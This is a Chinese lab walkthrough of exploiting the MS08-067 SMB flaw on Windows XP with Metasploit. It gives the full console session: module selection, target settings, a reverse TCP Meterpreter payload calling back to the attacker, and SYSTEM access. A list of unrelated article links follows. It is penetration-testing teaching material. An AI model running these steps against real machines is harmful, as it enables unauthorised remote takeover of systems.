ms08_067漏洞渗透步骤——MSF
本文简单介绍了如何使用metasploit针对ms08_067进行渗透测试,仅供学习
测试环境 | 描述 | ip |
---|---|---|
主机 | kali2020 | 192.168.1.113 |
目标主机 | win xp sp3 | 192.168.1.108 |
①启动msf,搜索ms08_067
msf6 > search ms08_067Matching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack CorruptionInteract with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
msf6 >
②使用ms08_067,设置参数,这里的target我设置为34,其他版本的可以使用show targets查看
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > optionsModule options (exploit/windows/smb/ms08_067_netapi):Name Current Setting Required Description---- --------------- -------- -----------RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'RPORT 445 yes The SMB service port (TCP)SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)LHOST 192.168.1.113 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Automatic Targetingmsf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.1.108
rhost => 192.168.1.108
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34
③进行攻击,获取meterpreter权限并进行提权
msf6 exploit(windows/smb/ms08_067_netapi) > exploit[*] Started reverse TCP handler on 192.168.1.113:4444
[*] 192.168.1.108:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.108
[*] Meterpreter session 2 opened (192.168.1.113:4444 -> 192.168.1.108:2354) at 2021-05-20 08:55:20 +0800meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
ms08_067漏洞渗透步骤——MSF相关推荐
- 内网渗透之MSF框架模块详细作用介绍
目录 Metasploit Framework MSF主机存活探测类 MSF主机端口扫描类 MSF主机服务探测类 MSF主机反弹shell类 MSF主机服务爆破类 MSF攻击模块利用类 MSF数据库提 ...
- 20145335郝昊《网络攻防》Exp5 MS08_067漏洞测试
20145335郝昊<网络攻防>Exp5 MS08_067漏洞测试 实验内容 了解掌握metasploit平台的一些基本操作,能学会利用已知信息完成简单的渗透操作. 漏洞MS08_067: ...
- Windows XP SP2 (Simplified Chinese MS08_067漏洞复现)
文章目录 一.漏洞详情 二.靶机搭建 kali Windows XP SP2 (Simplified Chinese ) 三.利用nmap对靶机扫描 四.漏洞利用 五.总结 一.漏洞详情 MS08-0 ...
- 利用CMS漏洞渗透并获取某服务器权限
利用CMS漏洞渗透并获取某服务器权限 在phpmyadmin漏洞与利用专题中,我们从多个角度介绍了如何获取webshell并获取服务器权限的案例和情形,但在实际渗透过程中还有一种情况,即服务器上存在p ...
- Kali Linux 基于FreeFloat FTP Server编写漏洞渗透模块(下)
目录 说明 Immunity Debugger+Mona 找到JMP ESP指令 漏洞渗透程序 在Immunity Debugger查看发送的字符 编写执行的程序 确定坏字符 Metasploit生成 ...
- WEB漏洞渗透测试靶场整理资源
WEB漏洞渗透测试靶场整理资源 在所有人目光之外,一个人无声的坍塌下去,像是被什么火烧尽了,只余下灰烬 整理了一些WEB漏洞本地靶场资源,包括针对性的漏洞专题如SQL注入,XSS等-以及合集类的如DV ...
- 经典的ms08_067 漏洞利用
ms08_067漏洞是smb服务的漏洞,而smb 服务是做什么的,很简单,他的一个经典使用方式就是共享文档(当然,这是windows里的服务内容),所以为了重现这个漏洞并让我们对其进行攻击,并取得控制 ...
- 为什么APP需要做漏洞渗透测试服务?
为什么APP需要做漏洞渗透测试服务?现实生活中小企业面对的网络安全风险多种多样.而真正的隐患,是公司觉得自己自身非常安全,却不知道隐患早就渗透到里面.随着安全产业的发展和技术人员安全防范意识的提升,以 ...
- 永恒之蓝(MS17-010)漏洞复现及msf常用渗透命令
环境部署 靶机:win7(172.168.100.158) 工具机:kali,nessus 攻击步骤 1.nessus扫描靶机 2.根据扫描结果查看靶机漏洞 3.发现靶机存在永恒之蓝(MS17-010 ...
最新文章
- SAP QM 使用QP01事务代码真的不能创建含有Multiple Specification的检验计划
- CaseStudy(showcase)界面篇-导出xaml以及放入Blend的技巧
- as cast float server sql_Sql Server中Float格式转换字符串varchar方法(转)
- LeetCode:204. 计数质数
- android编辑框最大字数,TextView 限制最大行数、最小行数、字数超过“...”表示...
- 前序表达式 中序表达式 后序表达式
- C++ 枚举类型的思考
- Android ListView 下拉刷新 上拉更多[实例]
- 熊出没之奇幻空间里面的机器人图片_武汉欢乐谷奇幻灯光节12月24日盛大开幕...
- Axure汉化下载步骤
- OPPO K9 Pro刷root强解锁BL刷面具Magisk框架 oppo k9pro root教程
- Linux安装JDK步骤
- 铁威马教程之如何轻松同步TNAS和云盘数据
- fms5序列号_火枫 FMS-105分体式炉头测评
- AUTOSAR CDD 模块解析 --- 设计建议
- asf格式如何转换为mp4?
- 石子合并问题(no circle)
- 区块链1——区块链基础
- adress标签的使用
- vue父子组件之间的传值,及互相调用父子组件之间的方法
热门文章
- 等高布局、圣杯布局、双飞翼布局的实现原理
- wsl Error: 0x80070003
- 深度 | 保险科技:人工智能等新技术在保险业的应用与展望
- window10+Anaconda下tensorflow-gpu1.8+GUDA9+cuDNN7的完整安装流程
- 【算法导论】python实现算法导论中的算法(传送门)
- Don’t Be Cute with Your Test Data
- corona sdk android,在Corona SDK中为Android添加标记
- Elasticsearch 跨网络、跨集群同步选型指南
- 2021-12-8数字通信的过程
- Linux下的 c 多线程与线程同步(二)